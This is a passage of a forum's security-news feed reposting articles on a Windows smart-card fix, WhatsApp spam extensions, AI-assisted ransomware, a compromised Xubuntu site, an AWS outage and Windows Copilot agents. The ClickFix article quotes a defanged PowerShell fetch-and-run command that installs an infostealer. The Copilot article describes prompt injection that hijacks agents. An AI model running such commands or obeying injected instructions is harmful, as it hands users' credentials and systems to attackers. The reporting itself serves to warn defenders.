	This fix is enabled by setting the DisableCapiOverrideForRSA registry key value to 1 to isolate cryptographic operations from the Smart Card implementation and block attackers from creating a SHA1 hash collision to bypass digital signatures on vulnerable systems.
</p>

<p>
	 
</p>

<p>
	Those who are experiencing authentication problems can manually resolve it by disabling the DisableCapiOverrideForRSA registry key using the following procedure:
</p>

<p>
	 
</p>

<ol>
	<li>
		Open Registry Editor. Press Win + R, type regedit, and press Enter. If prompted by User Account Control, click Yes.
	</li>
	<li>
		Navigate to the subkey. Go to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Calais.
	</li>
	<li>
		Edit the key and set the value. Inside Calais, check if key DisableCapiOverrideForRSA exists. Double-click DisableCapiOverrideForRSA. In Value date, enter: 0.
	</li>
	<li>
		Close and restart. Close Registry Editor. Restart the computer for changes to take effect.
	</li>
</ol>

<p>
	 
</p>

<p>
	However, it's important to note that you should first back up the registry before editing the Windows registry because any errors could lead to system issues.
</p>

<p>
	 
</p>

<p>
	While this will mitigate the issue, the DisableCapiOverrideForRSA registry key will be removed in April 2026, and Microsoft advised affected users to work with their application vendors to resolve the underlying problem.
</p>

<p>
	 
</p>

<p>
	Redmond fixed a similar issue that <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-10-auth-issue-impacting-remote-desktop/" rel="external nofollow" target="_blank">caused smartcard authentication failures</a> on Windows 10 systems when connecting via Remote Desktop.
</p>

<p>
	 
</p>

<p>
	On Thursday, Microsoft <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-bug-breaking-localhost-http-connections/" rel="external nofollow" target="_blank">fixed another known issue</a> breaking IIS websites and HTTP/2 localhost (127.0.0.1) connections after installing recent Windows security updates.
</p>

<p>
	 
</p>

<p>
	The same day, the company also <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-lifts-more-safeguard-holds-blocking-windows-11-updates/" rel="external nofollow" target="_blank">removed two compatibility holds</a> preventing users from upgrading their systems to Windows 11 24H2 via Windows Update.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-october-security-updates-cause-windows-smart-card-auth-issues/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Tuesday 21 October 2025 at 3:57 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">31985</guid><pubDate>Mon, 20 Oct 2025 17:58:09 +0000</pubDate></item><item><title>131 Chrome Extensions Caught Hijacking WhatsApp Web for Massive Spam Campaign</title><link>https://nsaneforums.com/news/security-privacy-news/131-chrome-extensions-caught-hijacking-whatsapp-web-for-massive-spam-campaign-r31982/</link><description><![CDATA[<p>
	Cybersecurity researchers have uncovered a coordinated campaign that leveraged 131 rebranded clones of a WhatsApp Web automation extension for Google Chrome to spam Brazilian users at scale.
</p>

<p>
	 
</p>

<p>
	The 131 spamware extensions share the same codebase, design patterns, and infrastructure, according to supply chain security company Socket. The browser add-ons collectively have about 20,905 active users.
</p>

<p>
	 
</p>

<p>
	"They are not classic malware, but they function as high-risk spam automation that abuses platform rules," security researcher Kirill Boychenko said. "The code injects directly into the WhatsApp Web page, running alongside WhatsApp's own scripts, automates bulk outreach and scheduling in ways that aim to bypass WhatsApp's anti-spam enforcement."
</p>

<p>
	 
</p>

<p>
	The end goal of the campaign is to blast outbound messaging via WhatsApp in a manner that bypasses the messaging platform's rate limits and anti-spam controls.
</p>

<p>
	 
</p>

<p>
	The activity is assessed to have been ongoing for at least nine months, with new uploads and version updates to the extensions observed as recently as October 17, 2025. Some of the identified extensions are listed below -
</p>

<p>
	 
</p>

<ul>
	<li>
		    YouSeller (10,000 users)
	</li>
	<li>
		    performancemais (239 users)
	</li>
	<li>
		    Botflow (38 users)
	</li>
	<li>
		    ZapVende (32 users)
	</li>
</ul>

<p>
	 
</p>

<p>
	The extensions have been found to embrace different names and logos, but, behind the scenes, the vast majority of them have been published by "WL Extensão" and its variant "WLExtensao." It's believed that the differences in branding are the result of a franchise model that allows the operation's affiliates to flood the Chrome Web Store with various clones of the original extension offered by a company named DBX Tecnologia.
</p>

<p>
	 
</p>

<p>
	These add-ons also claim to masquerade as customer relationship management (CRM) tools for WhatsApp, allowing users to maximize their sales through the web version of the application.
</p>

<p>
	 
</p>

<p>
	"Turn your WhatsApp into a powerful sales and contact management tool. With Zap Vende, you'll have an intuitive CRM, message automation, bulk messaging, visual sales funnel, and much more," reads the description of ZapVende on the Chrome Web Store. "Organize your customer service, track leads, and schedule messages in a practical and efficient way."
</p>

<p>
	 
</p>

<p>
	DBX Tecnologia, per Socket, advertises a reseller white-label program to allow prospective partners to rebrand and sell its WhatsApp Web extension under their own brand, promising recurring revenue in the range of R$30,000 to R$84,000 by investing R$12,000.
</p>

<p>
	 
</p>

<p>
	It's worth noting that the practice is in violation of Google's Chrome Web Store Spam and Abuse policy, which bans developers and their affiliates from submitting multiple extensions that provide duplicate functionality on the platform. DBX Tecnologia has also been found to have put out YouTube videos about bypassing WhatsApp's anti-spam algorithms when using the extensions.
</p>

<p>
	"The cluster consists of near-identical copies spread across publisher accounts, is marketed for bulk unsolicited outreach, and automates message sending inside web.whatsapp.com without user confirmation," Boychenko noted. "The goal is to keep bulk campaigns running while evading anti-spam systems."
</p>

<p>
	 
</p>

<p>
	The disclosure comes as Trend Micro, Sophos, and Kaspersky shed light on a large-scale campaign that's targeting Brazilian users with a WhatsApp worm dubbed SORVEPOTEL that's used to distribute a banking trojan codenamed Maverick.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2025/10/131-chrome-extensions-caught-hijacking.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31982</guid><pubDate>Mon, 20 Oct 2025 13:28:15 +0000</pubDate></item><item><title>AI in Ransomware Attacks: How Big is the Risk?</title><link>https://nsaneforums.com/news/security-privacy-news/ai-in-ransomware-attacks-how-big-is-the-risk-r31981/</link><description><![CDATA[<p>
	 
</p>

<p>
	<em><span style="font-size:18px;">Recent reports claim to showcase AI-powered ransomware. But how big is the risk to businesses?</span></em>
</p>

<p>
	 
</p>

<p>
	Beyond ransomware-as-a-a service, AI is making ransomware more available to cybercriminals with limited abilities. Anthropic reported that an adversary used the Claude chatbot for recon, code generation and credential theft against 17 organisations, including healthcare providers, government agencies and a defence contractor.
</p>

<p>
	 
</p>

<p>
	Meanwhile, cybersecurity firm ESET demonstrated a proof of concept showing what researchers call the first AI-powered ransomware.
</p>

<p>
	 
</p>

<p>
	Ransomware is bad enough on its own, with the malware now present in 44% all breaches, according to Verizon’s 2025 Data Breach Investigations report. So, how will AI technology affect the ransomware market? And are researchers’ predictions an indicator of what’s to come?
</p>

<p>
	 
</p>

<p>
	<strong>AI-Powered Ransomware</strong>
</p>

<p>
	 
</p>

<p>
	The technology is supercharging attacker capabilities, but not all cybersecurity experts are convinced of the risk from AI-powered ransomware. Rik Ferguson, VP of security intelligence at Forescout and cybersecurity industry veteran says the “loud AI-powered ransomware” headlines are “mostly hyperbole”.
</p>

<p>
	 
</p>

<p>
	Recent reports highlighting instances of AI-powered ransomware involved malware samples embedded with AI prompts capable of executing script commands for file discovery and encryption. However, they were not examples of real-world attacks, Robert McArdle, director of forward threat research at Trend Micro points out.
</p>

<p>
	 
</p>

<p>
	Instead, they originated from academic research and were uploaded to public repositories such as VirusTotal, where they were identified, he says.
</p>

<p>
	 
</p>

<p>
	And in fact, rather than offering an easy means to attack, the idea of AI-integrated ransomware actually presents several drawbacks for criminals using it, says McArdle. “Such malware is typically easier to detect and often relies on connections to cloud-based AI services, introducing additional risks. Threat actors must then evade detection from traditional security vendors, as well as from the security teams of large language model providers.”
</p>

<p>
	 
</p>

<p>
	The real criminal operational improvements today are in the back-end, says Ferguson says. “This is where AI sharpens target selection, personalises phishing at scale and dynamically tunes campaigns to raise conversion rates without raising flags.”
</p>

<p>
	 
</p>

<p>
	Taking this into account, Anthropic’s latest misuse report is the better compass of how adversaries are using AI in ransomware attacks, says Ferguson. “One adversary used Claude to automate reconnaissance, assist credential theft, triage targets and draft ransom notes, leaning on leak-based extortion rather than encryption. That’s the operational reality to plan for.”
</p>

<p>
	 
</p>

<p>
	<strong>The Real Risk of AI </strong>
</p>

<p>
	 
</p>

<p>
	As the area develops, experts agree that AI will play a role in a number of areas of the ransomware market. One is in the post-exfiltration phase of the ransomware kill chain, specifically in the monetisation of stolen data, says McArdle.
</p>

<p>
	 
</p>

<p>
	He describes a development in late August on the RAMP4U forum, where the Dragonforce ransomware group announced a new data analysis service. “This leverages AI to process stolen data and produce tailored outputs designed to increase pressure on victims.”
</p>

<p>
	 
</p>

<p>
	As large language models become more capable and accessible, attackers will move beyond using AI as a tool and start embedding it directly into their operations, Dan Jones, senior security advisor at Tanium tells SC Media UK.
</p>

<p>
	 
</p>

<p>
	This can range from adaptive reconnaissance to malware that learns from its environment, Jones says. He thinks ransomware strains will evolve to “negotiate, pivot and persist without the hacker needing to intervene”.
</p>

<p>
	 
</p>

<p>
	Looking ahead, AI-powered ransomware is likely to become more “autonomous adaptive, and stealthy”, agrees Steve Sandford, partner, digital forensics and incident response at Cyxcel. “Future variants may use reinforcement learning to optimise attack paths or integrate deepfake technology to impersonate executives and manipulate victims.”
</p>

<p>
	 
</p>

<p>
	<strong>Magic Malware</strong>
</p>

<p>
	 
</p>

<p>
	The addition of AI to ransomware operations means firms need to be on their guard. But the threat is not that large – at least yet.
</p>

<p>
	 
</p>

<p>
	Over the next year, expect AI to keep supercharging operations, not to create magic malware, says Ferguson. “Think dynamic victim profiling, adaptive phishing, faster privilege escalation, automated leak-site curation and tailored pressure campaigns.”
</p>

<p>
	 
</p>

<p>
	On the code side, he suggests more local models could be used to dodge provider guardrails. “But the measurable improvement for criminals will remain in scale and speed rather than novel exploits or attack chains.”
</p>

<p>
	 
</p>

<p>
	While generative AI is driving industry discourse, the most transformative impact is likely to come from agentic AI, says McArdle. “This does not rely on a single, all-powerful system, but on a network of specialised agents, each designed to perform a specific task. These agents are orchestrated by a central AI coordinator or digital assistant, which manages workflows, retains memory of past actions, and continuously learns to optimise performance. “
</p>

<p>
	 
</p>

<p>
	He thinks the adoption of agentic AI has the potential to move beyond the model of “cybercrime-as-a-service” to what he labels “cybercrime-as-a-servant”. This would enable criminals to “delegate complex operations to AI systems with minimal oversight”, he says.
</p>

<p>
	 
</p>

<p>
	For now, there are some simple steps firms can take to mitigate the threat. The right response isn’t to “panic” or “chase the next shiny security tool”, says Adam Seamons, head of information security at GRC International Group. “It’s about doing the basics properly, using strong identity controls, tested backups, behaviour-based detection, and people who trust their instincts when something seems wrong. In short, assume the attackers are using automation, and make sure you’re keeping up.”
</p>

<p>
	 
</p>

<p>
	And while the emergence of AI-powered ransomware might introduce new dimensions to cyber threats, it remains, at its core, a form of ransomware, McArdle points out. Therefore, he says, “established best practices for defending against attacks continue to be applicable”.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://insight.scmagazineuk.com/ai-in-ransomware-attacks-how-big-is-the-risk" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31981</guid><pubDate>Mon, 20 Oct 2025 13:20:44 +0000</pubDate></item><item><title>Microsoft Issues Final Windows 10 Update, Leaving 400 Million Users At Risk</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-issues-final-windows-10-update-leaving-400-million-users-at-risk-r31980/</link><description><![CDATA[<p>
	The latest Windows 10 update, KB5066791, is here. It patches some bugs but is mostly aimed at enterprise customers. So what makes it special, you might ask? It stands out because, unless you sign up to Microsoft’s Extended Security Updates, it’s the last Window 10 update you’ll ever see. 
</p>

<p>
	 
</p>

<p>
	That’s important because it means that your Windows 10 computer will gradually become less secure. 
</p>

<p>
	 
</p>

<p>
	“Microsoft does not warn that it’s the last update, but it does show a small nudge to sign up for Extended Security Updates,” Windows Latest reports.
</p>

<p>
	 
</p>

<p>
	So, what should you do to keep your PC secure?
</p>

<p>
	 
</p>

<p>
	First up, if you think you would like Windows 11 after all, it’s free to upgrade to it — and there are plenty of nudges from Microsoft to do that.
</p>

<p>
	 
</p>

<p>
	But what if your PC isn’t capable of running Windows 11? This is something you can check. Microsoft explained what to do in a recent support document: “To check if your PC is eligible for the free upgrade go to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update and select Check for updates,” it said.
</p>

<p>
	 
</p>

<p>
	But what if you like Windows 10, thank you very much, and don’t want to move to the next OS? There are hundreds of millions of users who haven’t chosen to move to Windows 11, by the way.
</p>

<p>
	 
</p>

<p>
	In that case, you have the ESU option. This will provide security updates for almost a year, until Oct. 14, 2026. Microsoft really does want you on Windows 11 after that, but you have 12 months grace to, as the company puts it, prepare for the transition to Windows 11.
</p>

<p>
	 
</p>

<p>
	To sign up to ESU costs $30, but you can choose to redeem 1,000 Microsoft Rewards points instead of paying cash. Even better, the $30 fee is waived, making it a free option, if you agree to sync your PC settings.
</p>

<p>
	 
</p>

<p>
	To sign up for this, go to Settings, then choose Update &amp; Security and Windows Update. If your device meets the prerequisites, click on the link marked Enroll now and sign in with your Microsoft account.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.forbes.com/sites/davidphelan/2025/10/20/microsoft-issues-final-windows-10-update-leaving-400-million-users-at-risk/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31980</guid><pubDate>Mon, 20 Oct 2025 13:11:50 +0000</pubDate></item><item><title>Xubuntu website compromised to deliver crypto malware to Windows 10 refugees</title><link>https://nsaneforums.com/news/security-privacy-news/xubuntu-website-compromised-to-deliver-crypto-malware-to-windows-10-refugees-r31979/</link><description><![CDATA[<p>
	You are probably aware, if you have been reading Neowin in recent weeks, that Windows 10 reached end of life on October 14.
</p>

<p>
	 
</p>

<p>
	For those people not able to upgrade to Windows 11, due to insufficient hardware, a popular choice has been to switch to Linux, and hackers know this. Well, over the weekend, the website of Xubuntu, an Ubuntu spin, was compromised to serve Windows malware.
</p>

<p>
	 
</p>

<p>
	According to OMG! Ubuntu, the malware was being served in the ironically-named file xubuntu-safe-download.zip, which was being downloaded by users who tried to download the official .torrent file. If you didn’t download the torrent, you should be fine.
</p>

<p>
	 
</p>

<p>
	Inside the zip file was a Windows .exe runtime which contained the malware and a terms of service text file. While this wouldn’t have tricked an experienced user, who knows they’re looking for an .ISO or .IMG file, a Linux novice who has never left Windows might not realize this and click the .exe, getting their machine infected.
</p>

<p>
	 
</p>

<p>
	The malware itself was designed to intercept links for cryptocurrency accounts copied to the clipboard, probably in an attempt to clear users out of their savings. As cryptocurrency is largely unregulated, it’s much harder to get your assets back when compared to money being taken from your bank account.
</p>

<p>
	 
</p>

<p>
	Once the team learned about what happened, they took down the affected download page immediately so others wouldn’t be able to infect their PC. The project said that it is expediting static site development to replace the aging WordPress instance.
</p>

<p>
	 
</p>

<p>
	While this sucks for the credibility of the Xubuntu project, users should be fully aware the compromise was very limited. No other flavours of Ubuntu, the Ubuntu infrastructure, or direct Xubuntu ISO downloads were compromised. Also, if you are running Xubuntu, there is no need to worry as this attack doesn’t affect you.
</p>

<p>
	 
</p>

<p>
	While the Xubuntu team works on the new website, you’ll need to head here <a href="https://cdimage.ubuntu.com/xubuntu/releases/" rel="external nofollow">https://cdimage.ubuntu.com/xubuntu/releases/</a> to download Xubuntu, which is safe to do.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.neowin.net/news/xubuntu-website-compromised-to-deliver-crypto-malware-to-windows-10-refugees/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31979</guid><pubDate>Mon, 20 Oct 2025 13:08:45 +0000</pubDate></item><item><title>Amazon Disruption Forces Hundreds of Websites Offline for Hours</title><link>https://nsaneforums.com/news/security-privacy-news/amazon-disruption-forces-hundreds-of-websites-offline-for-hours-r31975/</link><description><![CDATA[<p>
	Amazon Web Services, a major provider of cloud services, said most services were back up. Hulu, Snapchat, McDonald’s and the British government’s official site were among those that reported outages.
</p>

<p>
	 
</p>

<p>
	A disruption involving Amazon Web Services, the cloud service provider that powers much of the internet, took many websites and apps offline for over two hours on Monday, in the latest outage that showed the fragility of the global technology infrastructure.
</p>

<p>
	 
</p>

<p>
	The disruption affected websites and apps for some major banks, gaming sites and entertainment services starting shortly after 3 a.m. Eastern. Amazon said in an update at 5:27 a.m. that most websites and apps relying on its services were working normally again, and that it continued “to work through a backlog of queued requests.”
</p>

<p>
	 
</p>

<p>
	Major services were affected, including WhatsApp, the British government’s website and government tax services, the payment app Venmo, the cryptocurrency platform Coinbase and games at The New York Times. Dozens of other companies and retailers — including Amazon, Venmo, Hulu, Snapchat, Ring doorbells and McDonald’s — also experienced service interruptions.
</p>

<p>
	 
</p>

<p>
	It was not immediately clear what led to the outage, and there were no indications that it had been caused by a cyberattack.
</p>

<p>
	 
</p>

<p>
	Experts said that the disruption showed again how the internet’s reliance on a few major technology providers — including Amazon, Microsoft and Google — can affect millions of users when one service breaks down. Last year, a much wider, daylong internet outage was caused by a faulty update sent out by a little known cybersecurity company called CrowdStrike.
</p>

<p>
	 
</p>

<p>
	Amazon Web Services counts thousands of clients who rely on it for complex, demanding, data-intensive operations including streaming video, running web applications and storing huge amounts of digital information. Amazon’s cloud-computing division has set up infrastructure all around the world, allowing companies to make their products accessible to customers across the globe. By renting the service, clients can scale up or down without having to invest in otherwise costly hardware.
</p>

<p>
	 
</p>

<p>
	In its initial statement on the outage, Amazon’s said early Monday that 28 of its services, including those in the “US-EAST-1” region, were having issues and that its engineers had been working on limiting the effects and identifying the cause.
</p>

<p>
	 
</p>

<p>
	Rob Jardin, the chief digital officer at NymVPN, a virtual private network service, said that early indications were that the outage may have been caused by a technical fault affecting one of Amazon’s main data centers.
</p>

<p>
	 
</p>

<p>
	“Outages of this scale expose our overreliance on centralized infrastructures,” he said in a statement. “The internet was originally designed to be decentralized and resilient, yet today so much of our online ecosystem is concentrated in a small number of cloud regions.”
</p>

<p>
	<br />
	Some media advocates said that the outage, which caused disruptions to secure communications apps such as Signal and other digital tools, showed how the internet’s reliance on a few major technology companies posed a risk to free speech.
</p>

<p>
	 
</p>

<p>
	“When a single provider goes dark, critical services go offline with it,” Corinne Cath-Speth, head of digital for Article 19, a free speech advocacy group, said in a statement. She added that there was an urgent need for diversification in cloud computing. “The infrastructure underpinning democratic discourse, independent journalism and secure communications cannot be dependent on a handful of companies.”
</p>

<p>
	 
</p>

<p>
	Still, Amazon’s share price barely moved in premarket trading, suggesting that investors were not too bothered about the outage. In the first half of the year, Amazon Web Services accounted for nearly 20 percent of Amazon’s sales, but about 60 percent of its operating profit.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.nytimes.com/2025/10/20/business/aws-down-internet-outage.html" rel="external nofollow">Source</a></strong>
</p>

<p>
	 
</p>

<p>
	<em>Also: <a href="https://www.bbc.com/news/live/c5y8k7k6v1rt" rel="external nofollow"> Live: Amazon services showing 'signs of recovery' after Snapchat and banks among sites hit by major outage</a></em>
</p>

<p>
	<em>          </em><a href="https://www.bleepingcomputer.com/news/technology/aws-outage-crashes-amazon-primevideo-fortnite-perplexity-and-more/" rel="external nofollow">AWS outage crashes Amazon, PrimeVideo, Fortnite, Perplexity and more</a>
</p>
]]></description><guid isPermaLink="false">31975</guid><pubDate>Mon, 20 Oct 2025 12:28:24 +0000</pubDate></item><item><title>TikTok videos continue to push infostealers in ClickFix attacks</title><link>https://nsaneforums.com/news/security-privacy-news/tiktok-videos-continue-to-push-infostealers-in-clickfix-attacks-r31973/</link><description><![CDATA[<p>
	Cybercriminals are using TikTok videos disguised as free activation guides for popular software like Windows, Spotify, and Netflix to spread information-stealing malware.
</p>

<p>
	 
</p>

<p>
	ISC Handler Xavier Mertens spotted the ongoing campaign, which is largely the same as the one <a href="https://www.bleepingcomputer.com/news/security/tiktok-videos-now-push-infostealer-malware-in-clickfix-attacks/" rel="external nofollow" target="_blank">observed by Trend Micro</a> in May
</p>

<p>
	 
</p>

<p>
	The TikTok videos seen by BleepingComputer pretend to offer instructions on how to activate legitimate products like Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro, as well as made-up services such as Netflix and Spotify Premium.
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="tiktok-videos.jpg" class="ipsImage" height="714" width="720" src="https://www.bleepstatic.com/images/news/security/t/tiktok/infostealers/tiktok-videos.jpg">
		<figcaption>
			<em>Malicious videos on TikTok pushing infostealers<br>
			Source: BleepingComputer.com</em>
		</figcaption>
	</figure>
</div>

<p>
	The videos are performing a ClickFix attack, which is a social engineering technique that provides what appears to be legitimate "fixes" or instructions that trick users into executing malicious PowerShell commands or other scripts that infect their computers with malware.
</p>

<p>
	 
</p>

<p>
	Each video displays a short one-line command and tells viewers to run it as an administrator in PowerShell:
</p>

<pre style="margin-left: 40px;"><code>iex (irm slmgr[.]win/photoshop)</code></pre>

<p>
	It should be noted that the program name in the URL is different depending on the program that is being impersonated. For example, in the fake Windows activation videos, instead of the URL containing <em>photoshop</em>, it would include <em>windows</em>.
</p>

<p>
	 
</p>

<p>
	In this campaign, when the command is executed, PowerShell connects to the remote site slmgr[.]win to retrieve and execute another PowerShell script.
</p>

<p>
	 
</p>

<p>
	This script downloads two executables from Cloudflare pages, with the first executable downloaded from https://file-epq[.]pages[.]dev/updater.exe [<a href="https://www.virustotal.com/gui/file/58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8" rel="external nofollow" target="_blank">VirusTotal</a>]. This executable is a variant of the <a href="http://AuroStealer" rel="external nofollow" target="_blank">Aura Stealer</a> info-stealing malware.
</p>

<p>
	 
</p>

<p>
	Aura Stealer collects saved credentials from browsers, authentication cookies, cryptocurrency wallets, and credentials from other applications and uploads them to the attackers, giving them access to your accounts.
</p>

<p>
	 
</p>

<p>
	Mertens says that an additional payload will be downloaded, named source.exe [<a href="https://www.virustotal.com/gui/file/db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011" rel="external nofollow" target="_blank">VirusTotal</a>], which is used to self-compile code using .NET's built-in Visual C# Compiler (csc.exe). This code is then injected and launched in memory.
</p>

<p>
	 
</p>

<p>
	The purpose of the additional payload remains unclear.
</p>

<p>
	 
</p>

<p>
	Users who perform these steps should consider all of their credentials compromised and immediately reset their passwords on all sites they visit.
</p>

<p>
	 
</p>

<p>
	ClickFix attacks have become very popular over the past year, used to distribute various malware strains in ransomware and cryptocurrency theft campaigns.
</p>

<p>
	 
</p>

<p>
	As a general rule, users should never copy text from a website and run it in an operating system dialog box, including within the <a href="https://www.bleepingcomputer.com/news/security/filefix-attack-weaponizes-windows-file-explorer-for-stealthy-powershell-commands/" rel="external nofollow" target="_blank">File Explorer address bar</a>, command prompt, PowerShell prompts, macOS terminal, and Linux shells.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/tiktok-videos-continue-to-push-infostealers-in-clickfix-attacks/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Monday 20 October 2025 at 12:15 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">31973</guid><pubDate>Mon, 20 Oct 2025 02:16:12 +0000</pubDate></item><item><title>Windows 11 AI agents will act on your behalf - how much can you trust them?</title><link>https://nsaneforums.com/news/security-privacy-news/windows-11-ai-agents-will-act-on-your-behalf-how-much-can-you-trust-them-r31964/</link><description><![CDATA[<p>
	<span style="font-size:18px;"><strong>Should you trust this Copilot agent to poke around your files and interact with apps? The last time Microsoft rolled out a major AI feature, it didn't go well. </strong></span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:18px;"><strong>ZDNET's key takeaways</strong></span>
</p>

<p>
	 
</p>

<ul>
	<li>
		    Windows 11 is adding AI agents that can take actions on your behalf.
	</li>
	<li>
		    Copilot agents represent potential security and privacy risks.
	</li>
	<li>
		    Expect testing and more security controls before the feature goes public.
	</li>
</ul>

<p>
	 
</p>

<p>
	Every computer security decision ultimately comes down to a question of trust. Should you install this program you're about to download from an unfamiliar website? Are you certain that your email messages are going directly to their recipient without being intercepted? Is it safe to provide that merchant with your credit card details?
</p>

<p>
	 
</p>

<p>
	Soon, owners of PCs running Windows 11 will have another question to add to that list: Should you trust this Copilot agent to poke around in your files and interact with apps on your behalf?
</p>

<p>
	 
</p>

<p>
	Here's how Microsoft describes the Copilot Actions feature, which is rolling out for testing by members of the Windows Insider Program:
</p>

<p>
	 
</p>

<p style="margin-left:40px;">
	<strong>Copilot Actions is an AI agent that completes tasks for you by interacting with your apps and files, using vision and advanced reasoning to click, type, and scroll like a human would.</strong>
</p>

<p style="margin-left:40px;">
	 
</p>

<p style="margin-left:40px;">
	<strong>This transforms agents from passive assistants into active digital collaborators that can carry out complex tasks for you to enhance efficiency and productivity -- like updating documents, organizing files, booking tickets, or sending emails. After you've granted the agent access, when integrated with Windows, the agent can take advantage of what you already have on your PC, like your apps and data, to complete tasks for you.</strong>
</p>

<p>
	 
</p>

<p>
	These are pretty big trust decisions. Allowing an agent to interact with your personal files requires a leap of faith. So does the idea of letting an agent act on your behalf in apps -- where, presumably, you are signed in using some sort of secure credentials.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:20px;"><strong>Learning from the past</strong></span>
</p>

<p>
	 
</p>

<p>
	The last time Microsoft rolled out a major AI feature with this level of access to your personal data, it ... didn't go well. The Windows Recall feature was slammed by security researchers, delayed for months, and finally relaunched with major privacy and security changes. Ultimately, it was nearly a year before the feature made it to public builds.
</p>

<p>
	 
</p>

<p>
	This time around, Microsoft is taking no such chances. In a pair of on-the-record briefings ahead of the public debut of the Copilot Actions feature, executives at the company went to great pains to emphasize its commitment to privacy and security controls.
</p>

<p>
	 
</p>

<p>
	For starters, the feature is rolling out as a preview, in "experimental mode," exclusively for customers who've opted into the Windows Insider Program for pre-release builds of Windows.
</p>

<p>
	 
</p>

<p>
	The feature is disabled by default and only enabled when the user flips the "Experimental agentic features" switch in Windows Settings &gt; System &gt; AI components &gt; Agent tools.
</p>

<p>
	 
</p>

<p>
	Agents that integrate with Windows must be digitally signed by a trusted source, much as executable apps are. That precaution should make it possible to revoke and block malicious agents.
</p>

<p>
	 
</p>

<p>
	Agents will run under a separate standard account that is only provisioned when the user enables the feature. For now, at least, the agent account will have access to a limited set of so-called known folders in the logged-on user's profile -- including Documents, Downloads, Desktop, and Pictures. The user needs to explicitly grant permission to access files in other locations.
</p>

<p>
	 
</p>

<p>
	All of those actions will happen in a contained environment called the Agent workspace, with its own desktop and only limited access to the user's desktop. In principle, this kind of runtime isolation and granular control over permissions is similar to existing features like the Windows Sandbox.
</p>

<p>
	 
</p>

<p>
	In a blog post highlighting these security features, Dana Huang, corporate vice president, Windows Security, said, "[A]n agent will start with limited permissions and will only obtain access to resources you explicitly provide permission to, like your local files. There is a well-defined boundary for the agent's actions, and it has no ability to make changes to your device without your intervention. This access can be revoked at any time."
</p>

<p>
	 
</p>

<p>
	The security stakes for this kind of feature are high. As Huang noted, "[A]gentic AI applications introduce novel security risks, such as cross-prompt injection (XPIA), where malicious content embedded in UI elements or documents can override agent instructions, leading to unintended actions like data exfiltration or malware installation." And, of course, there's always the risk that an AI-powered agent will confidently perform the wrong action.
</p>

<p>
	 
</p>

<p>
	In an interview, Microsoft's Peter Waxman confirmed that the company's security researchers are actively "red-teaming" the Copilot Actions feature, although he declined to discuss any specific scenarios that they've tested.
</p>

<p>
	 
</p>

<p>
	Microsoft said the feature will be evolving continuously during the experimental preview period, with "more granular security and privacy controls" arriving before the features are released to the public.
</p>

<p>
	 
</p>

<p>
	Will those caveats and disclaimers be sufficient to satisfy the notoriously skeptical community of security researchers? We're about to find out.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.zdnet.com/article/windows-11-ai-agents-will-act-on-your-behalf-how-much-can-you-trust-them/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31964</guid><pubDate>Sun, 19 Oct 2025 15:41:22 +0000</pubDate></item><item><title>Google has killed Privacy Sandbox</title><link>https://nsaneforums.com/news/security-privacy-news/google-has-killed-privacy-sandbox-r31952/</link><description><![CDATA[<p>
	Google's Privacy Sandbox is officially dead. In an update on the project's website, Google Vice President Anthony Chavez has announced that the company was sunsetting the remaining technologies developed for Sandbox due to their "low levels of adoption." A spokesperson has confirmed to AdWeek that Google isn't just killing those technologies, it's retiring the whole initiative altogether. "We will be continuing our work to improve privacy across Chrome, Android and the web, but moving away from the Privacy Sandbox branding," the spokesperson said. "We're grateful to everyone who contributed to this initiative, and will continue to collaborate with the industry to develop and advance platform technologies that help support a healthy and thriving web."
</p>

<p>
	 
</p>

<p>
